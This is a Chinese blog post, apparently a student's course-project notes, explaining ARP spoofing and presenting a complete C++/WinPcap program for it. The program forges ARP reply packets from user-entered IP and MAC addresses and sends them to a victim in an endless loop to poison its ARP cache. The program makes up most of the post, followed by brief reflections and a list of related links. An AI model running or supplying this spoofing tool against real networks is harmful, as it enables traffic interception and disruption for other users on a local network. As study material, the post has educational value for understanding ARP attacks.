学习笔记——C++实现ARP欺骗
来源:互联网 发布:餐饮成本软件 编辑:程序博客网 时间:2024/05/16 06:34
谢谢指正错误
在课设期间,从网上学习了简单的实现ARP欺骗
ARP欺骗的原理很简单:通过不断的向目标发送ARP包,致使目标主机的ARP缓存表中正确的IP映射的是错误的MAC地址
在书上的介绍中,采用了WinPcap的开发包,这样很方便的对网卡进行操作
所以,首先需要安装winpacp,并下载开发者包https://www.winpcap.org/devel.htm
对项目文件属性进行配置
1.
2.
3.
4.
以下是根据网上的学习,所实现的代码:
#ifndef WIN32_LEAN_AND_MEAN#define WIN32_LEAN_AND_MEAN#endif#include <stdio.h>#include <stdlib.h> #include "pcap.h"#include <string.h>// DLC Header#pragma pack (1)//使结构体按1字节方式对齐typedef struct tagDLCHeader{ unsigned char DesMAC[6];//以太网目的mac地址 unsigned char SrcMAC[6];//以太网源目的mac地址 unsigned short Ethertype;//帧类型} DLCHEADER, *PDLCHEADER;typedef struct tagARPFrame{ unsigned short HW_Type;//硬件类型,2字节,填充0x0001 unsigned short Prot_Type;//协议的类型,2字节,填充0x0800 unsigned char HW_Addr_Len;//MAC地址长度,1字节 unsigned char Prot_Addr_Len;//IP地址长度,1字节 unsigned short Opcode;//操作码,2字节,0x0001为请求包,0x0002为应答包 unsigned char Send_HW_Addr[6];//发送方的MAC地址 unsigned long Send_Prot_Addr;//发送方的IP地址 unsigned char Targ_HW_Addr[6];//接受方的MAC地址 unsigned long Targ_Prot_Addr;//接收方的IP地址// unsigned char padding[18];} ARPFRAME, *PARPFRAME;// ARP Packet = DLC header + ARP Frametypedef struct tagARPPacket{ DLCHEADER dlcHeader; //以太网头部 ARPFRAME arpFrame;//arp头部} ARPPACKET, *PARPPACKET;#pragmaint mac_str_to_bin(char *str, char *mac){ int i; char *s, *e; if ((mac == NULL) || (str == NULL)) { return -1; } s = (char *)str; for (i = 0; i < 6; ++i) { mac[i] = s ? strtoul(s, &e, 16) : 0; if (s) s = (*e) ? e + 1 : e; } return 0;}//pcap_t *adhandle;char errbuf[PCAP_ERRBUF_SIZE];pcap_if_t *alldevs;pcap_if_t *d;pcap_t * init(){// pcap_if_t *alldevs;// pcap_if_t *d; int inum; int i = 0; //网卡数量 /* Retrieve the device list */ //获取当前网卡列表 if (pcap_findalldevs(&alldevs, errbuf) == -1) { fprintf(stderr, "Error in pcap_findalldevs: %s\n", errbuf); exit(1); } //打印网卡的列表 for (d = alldevs; d; d = d->next) { printf("%d. %s", ++i, d->name); //如果有网卡就打印出来 if (d->description) { printf("(%s)\n ", d->description); } else { printf(" (No description available)\n "); } } if (i == 0) { printf("\nNo interfaces found! Make sure WinPcap is installed.\n"); return 0; } printf("Enter the interface number (1-%d):", i); scanf_s("%d", &inum, sizeof(int)); if (inum < 1 || inum > i) { printf("\nInterface number out of range.\n"); /* Free the device list */ pcap_freealldevs(alldevs); return 0; } //跳转到所选择的适配器 for (d = alldevs, i = 0; i < inum - 1; d = d->next, i++) //打开所选的网卡适配器 if ((adhandle = pcap_open_live(d->name, //适配器的名称 65535, //捕获的数据包的部分。 //65535是捕获所有流经的数据包,所有的数据包通过都产生端口 0, 1000, //读取超时时间 errbuf //错误缓存 )) == NULL) { fprintf(stderr, "\nUnable to open the adapter. %s is not supported by WinPcap\n", d->name); /* Free the device list */ pcap_freealldevs(alldevs); return 0; } printf("\nlistening on %s...\n", d->description); /* At this point, we don't need any more the device list. Free it */ //当监控某个网卡适配器后,就释放其他的,因为用不到了 pcap_freealldevs(alldevs); return adhandle;}void sendArpPacket(pcap_t * fp, ARPPACKET &ARPPacket){ /* Send down the packet */ if (pcap_sendpacket(fp, // Adapter (const u_char *)&ARPPacket, // buffer with the packet sizeof(ARPPacket) // size ) != 0) { fprintf(stderr, "\nError sending the packet: %s\n", pcap_geterr(fp)); printf("send NULL ! \n"); return; } else { // printf("%d", sizeof(ARPPacket)); printf("send OK ! \n"); }}ARPPACKET makeArp(int a){ ARPPACKET ARPPacket;// 定义ARPPACKET结构体变量 int arpType; struct in_addr s; char* srcIP; srcIP = (char*)malloc(sizeof(char) * 16); char* desIP; desIP = (char*)malloc(sizeof(char) * 16); char* srcMac; srcMac = (char*)malloc(sizeof(char) * 18); char* desMac; desMac = (char*)malloc(sizeof(char) * 18); if (a == 1) { printf("欺骗a方:\n"); printf("请输入b方ip地址:"); scanf_s("%s", srcIP, 16); printf("请输入a方ip地址:"); scanf_s("%s", desIP, 16); printf("请输入arp包类型[01:请求 02:应答包][若需攻击则为02]:"); scanf_s("%d", &arpType, sizeof(int)); printf("请输入本机mac地址:[格式为ff:ff:ff:ff:ff:ff]"); scanf("%s", srcMac); printf("请输入a方mac地址:[格式为ff:ff:ff:ff:ff:ff]"); scanf("%s", desMac); } /*else if(a==2) { printf("欺骗B方:\n"); printf("请输入A方IP地址:"); scanf_s("%s", srcIP, 16); printf("请输入B方IP地址:"); scanf_s("%s", desIP, 16); printf("请输入ARP包类型[01:请求 02:应答包][若需攻击则为02]:"); scanf_s("%d", &arpType, sizeof(int)); printf("请输入本机MAC地址:[格式为ff:ff:ff:ff:ff:ff]"); scanf_s("%s", srcMac, 12); printf("请输入B方MAC地址:[格式为ff:ff:ff:ff:ff:ff]"); scanf_s("%s", desMac, 12); }*/ mac_str_to_bin(srcMac, (char*)ARPPacket.dlcHeader.SrcMAC); mac_str_to_bin(desMac, (char*)ARPPacket.dlcHeader.DesMAC); ARPPacket.dlcHeader.Ethertype = htons((unsigned short)0x0806); // DLC Header的以太网类型ARP包 ARPPacket.arpFrame.HW_Type = htons((unsigned short)0x0001); ARPPacket.arpFrame.Prot_Type = htons((unsigned short)0x0800); ARPPacket.arpFrame.HW_Addr_Len = (unsigned char)6;//MAC地址长度 ARPPacket.arpFrame.Prot_Addr_Len = (unsigned char)4;// IP地址长度 ARPPacket.arpFrame.Opcode = htons((unsigned short)arpType);//arp包类型 mac_str_to_bin(srcMac, (char*)ARPPacket.arpFrame.Send_HW_Addr); ARPPacket.arpFrame.Send_Prot_Addr = inet_addr(srcIP);// 源IP // printf("%6.6x \n", ARPPacket.arpFrame.Send_Prot_Addr); mac_str_to_bin(srcMac, (char*)ARPPacket.arpFrame.Targ_HW_Addr); ARPPacket.arpFrame.Targ_Prot_Addr = inet_addr(desIP);//目的IP // printf("%6.6x \n", ARPPacket.arpFrame.Targ_Prot_Addr); return ARPPacket;}int main(int argc, char **argv) { pcap_t * adhandle = init(); ARPPACKET ARPPacket_A = makeArp(1);// ARPPACKET ARPPacket_B = makeArp(2); while (true) { sendArpPacket(adhandle, ARPPacket_A); // sendArpPacket(adhandle, ARPPacket_B); Sleep(500);// Sleep(1000); } pcap_close(adhandle); return 0;}
实现之后的操作结果如图所示:
结果在wareshark中抓包,显示如图:
这次课设,了解了ARP的包结构和使用winpacp的发包与收包工作,同时如何构造ARP包,IP包,UDP包,学习书上对于IP包的分析代码也是很有收获。
阅读全文
0 0
- 学习笔记——C++实现ARP欺骗
- 上网记——ARP欺骗与反ARP欺骗
- 上网记——ARP欺骗与反ARP欺骗
- 【WinPcap】——ARP欺骗
- 实现ARP欺骗1
- ARP中间人欺骗实现
- scapy学习arp欺骗
- 在linux下使用c语言实现ARP欺骗
- 关于Kali进行ARP欺骗的学习笔记
- ARP数据包格式、ARP欺骗编程实现
- kali 实现arp攻击和arp欺骗
- ARP欺骗原理及实现
- 使用JPCAP实现ARP欺骗
- 网际层——ARP欺骗之窃听秘密及实现
- ARP 欺骗
- ARP欺骗
- ARP欺骗
- ARP欺骗
- ActiveMQ的安装和启动 安装JAVA配置JAVA环境 下载ActiveMQ 解压压缩包 tar zxvf activemq-x.x.x-bin.tar.gz 至此,linux下Activ
- mfc高仿QQ截图
- spark开发环境搭建
- Gradle Build速度加快终极方法
- Kubernetes单机部署手册
- 学习笔记——C++实现ARP欺骗
- 软件质量没有银弹:阿里巴巴的25个技术实践与坑
- 使用PHP生成二维码的两种方法(带logo图像)
- Android四大组件之Activity
- php 单例模式
- thinkphp手册
- bzoj 3622 已经没有什么好害怕的了
- JAVA标识符、命名
- 虚拟机在开机启动时,提示“unexpected inconsistency;RUN fsck MANUALLY”进不了系统